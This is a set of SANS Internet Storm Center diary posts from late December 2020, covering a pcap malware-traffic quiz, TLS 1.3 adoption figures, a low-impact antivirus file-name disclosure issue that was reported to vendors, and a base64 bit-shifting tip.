[11] https://www.sans.org/security-awareness-training?msc=main-nav

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 1.

Strings 2021, (Fri, Jan 1st)

This year, for my diary entries with malware analysis, I will check each time if a malware sample can be analyzed with the strings command (or a variant). And if it does, I'll write-up a second analysis with the strings command.

Although most malware samples don't contain clear text strings, I regularly encounter samples that do.

I hope this will make malware analysis more accessible to a larger audience.

Best wishes for the new year to you and your family from all of us at the SANS Internet Storm Center!

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. január 1.

End of Year Traffic Analysis Quiz, (Thu, Dec 31st)

Introduction

I wanted to leave you all with one final traffic analysis quiz for Windows-based malware infection traffic.  You can find the pcaps here.  Today's exercise has 6 pcaps of different Windows-based malware infections.  Your task for this quiz?  Determine what type of malware caused the infection for each pcap.  I didn't provide any alerts like I've done for previous quizes.  Today's quiz is just a casserole of pcap files, cooked up, and served piping hot!


Shown above: A food-based visual for this end-of-year traffic analysis quiz.

A PDF document of answers is also included on the page I linked to earlier.  The answers contains associated IOCs for the infections that can be extracted from the pcaps.  But don't peek!  First, see how much you can determine from examining the pcaps.

Requirements

This type of analysis requires Wireshark.  Wireshark is my tool of choice to review pcaps of infection activity.  However, default settings for Wireshark are not optimized for web-based malware traffic.  That's why I encourage people to customize Wireshark after installing it.  To help, I've written a series of tutorials.  The ones most helpful for this quiz are:

Furthermore, I  recommend using a non-Windows environment like BSD, Linux, or macOS to analyze malicious traffic.  Some of these pcaps contain HTTP traffic sending Windows-based malware.  If you're using a Windows host to review the pcaps, your antivirus (or Windows Defender) may delete the pcap or malware.  Worst case scenario?  If you extract the malware from the pcaps and accidentally run the files, you might infect your Windows computer.

So beware, because there's actual malware involved in parts of this quiz.

Final words

Hope everyone has a happy and healthy year as we enter 2021.

Again, the pcaps and answers for this end-of-year traffic analysis quiz can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 30.

TLS 1.3 is now supported by about 1 in every 5 HTTPS servers, (Wed, Dec 30th)

TLS 1.3 has been with us for couple of years now[1]. It has brought significant security improvements over previous TLS versions (as well as couple of slightly controversial ideas, such as the 0-RTT) and although its adoption is far from universal as of now, the number of servers which support it seems to be slowly increasing.

As you may see from the following chart, which is based on data I’ve gathered over the past three months from Shodan.io, TLS 1.3 was supported by over 20 percent of all HTTPS servers on the internet during the last quarter of 2020. And although the number has recently slightly fallen, the overall rising trend is clearly visible (see the trendline).

The increase in support of TLS 1.3 isn’t the only good news worth mentioning when it comes to the overall security of HTTPS traffic on the internet during the last quarter of 2020.  That is because the support for SSL 2.0 has been steadily dropping. At the beginning of October, the number of HTTPS servers supporting this outdated protocol fell bellow one million and currently only about 1.5 percent of all HTTPS servers on the internet still support its use.

The fact that there are still servers which support SSL 2.0 out there is of course far from ideal (last year, there were still even few internet banking portals, which still supported it[2]), but the numbers show that the situation is indeed getting better.

I’ll add that since some of our readers have reached out to me with requests for either data I’ve gathered from Shodan, or for the script I’ve used to get them, I’ve decided to open source the tool and I will publish it in January 2021. So if you’d like to gather your own data from Shodan about open ports, vulnerabilities or TLS support in your country or around the world, stay tuned…

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 30.

ISC Stormcast For Wednesday, December 30th 2020 https://isc.sans.edu/podcastdetail.html&#x3f;id=7310, (Wed, Dec 30th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 29.

Want to know what's in a folder you don't have a permission to access&#x3f; Try asking your AV solution..., (Tue, Dec 29th)

Back in February, I wrote a diary about a small vulnerability in Windows, which allows users to brute-force names of files in folders, which they don’t have permission to open/list[1]. While thinking on the topic, it occurred to me that a somewhat-complete list of files placed in a folder one can’t access due to lack of permissions might potentially be obtained by scanning the folder with an anti-malware solution, which displays files which are currently being scanned.

As you may see in the example above, names of scanned files are indeed displayed by some of the anti-malware solutions out there. And since most anti-malware tools run by necessity with high (i.e. SYSTEM level) privileges, and it is customary to allow any user to initiate a scan of arbitrary folder, this may easily lead to unexpected information disclosure (that is, unless the authors of the tool explicitly decided to stop users from scanning folders, for which they don’t have access permissions).

Admittedly, the impact of this would be rather low – unless the anti-malware solution logged the name of each scanned file in a way which would enable a user to read the entire log afterwards, it would be limited to disclosure of the names of files which the user would be able to see/record during the scan itself. Still, it might provide a way by which many anti-malware solutions might be used to bypass confidentiality controls set at the file system level.

Back in February, I decided to do a short test in order to see how large a portion of AV solutions might actually be abused this way. Since I didn’t intend to do a comprehensive analysis of all tools out there, I’ve limited the test to only 25 anti-malware tools from different vendors mentioned in the Wikipedia article on Comparison of antivirus software[2].

The results were quite interesting. Eight of the tools (i.e. approximately one third) didn’t scan contents of any folder, which was inaccessible to the user who initiated the scan, while the remaining seventeen did. Of these, eight did display the names of analyzed files during a scan.

One further point to note is that any of the 17 tools, which enabled users to scan arbitrary folders, might have been used in conjunction with Sysinternals Process Monitor[3] to discover names of all files in any folder (i.e. one would run ProcMon, initiate scan of a folder and then list all files in the relevant path which the anti-malware solution read).

Of course, as this would require local administrator permissions on the part of the user, it is hardly a major issue, since the user could simply change the permissions on the target folder in order to gain access to its contents. Using anti-malware tool in conjunction with ProcMon would however not result in creation of any suspicious audit trail, which might be left behind, were one to simply change the access permissions.

Although the confidentiality impact of the behavior described above was quite low, I contacted all vendors, whose tools I have determined might be abused in this manner. My assumption was that for those anti-malware tools, which enabled users to scan folders they didn’t have access to, this was the result of an intentional design decision on the part of their authors, but I wanted to be sure.

Not every company replied, but for most of those which did, my assumption proved to be correct as the behavior of their tools was confirmed to be intentional. In only two cases the behavior was deemed to constitute a potential security risk and the vendors decided to change it in subsequent updates.

Even though it is only a low impact issue, it is good to know that it exists. After all, if the results of the test were representative for anti-malware solutions at large, low privileged users might potentially be able to use about each third one to partially bypass file system permissions preventing them from listing contents of folders and local admins could completely bypass them with the help of anti-malware in two out of three cases.

[1] https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/
[2] https://en.wikipedia.org/wiki/Comparison_of_antivirus_software
[3] https://docs.microsoft.com/en-us/sysinternals/downloads/procmon

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 29.

ISC Stormcast For Tuesday, December 29th 2020 https://isc.sans.edu/podcastdetail.html&#x3f;id=7308, (Tue, Dec 29th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 28.

ISC Stormcast For Monday, December 28th 2020 https://isc.sans.edu/podcastdetail.html&#x3f;id=7306, (Mon, Dec 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2020. december 27.

Quickie: Bit Shifting With translate.py, (Sun, Dec 27th)

As promised in diary entry "Corrupt BASE64 Strings: Detection and Decoding", I explain here how to shift bits with my translate.py tool:

Here is a BASE64 string (SGVsbG8sIHdvcmxkLg==) that decodes to "Hello, world.":

Corrupting this BASE64 string by removing the first character (S) means that it is no longer detected:

And truncating the length to a multiple of 4 (with Python function L4) makes that it gets detected, but not decoded properly:

We then proceeded in diary entry "Corrupt BASE64 Strings: Detection and Decoding" to manipulate the input BASE64 string so that we arrived at a decoded string we could recognize.

Here, in stead of manipulating the input BASE64 string, I'm manipulating the output by shifting bits.

Each character in a BASE64 string represents 6 bits. So I will bit shift the output with 2, 4 and 6 bits to the right using my translate.py tool like this (this command shifts the complete byte sequence, not individual bytes):

The result here is that a bit shift to the right of 6 bits results in a decoded BASE64 string that we can recognize.

With this we know that it is likely that we are missing one BASE64 character at the beginning, and thus we can try fixing it like explained in previous diary entry.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.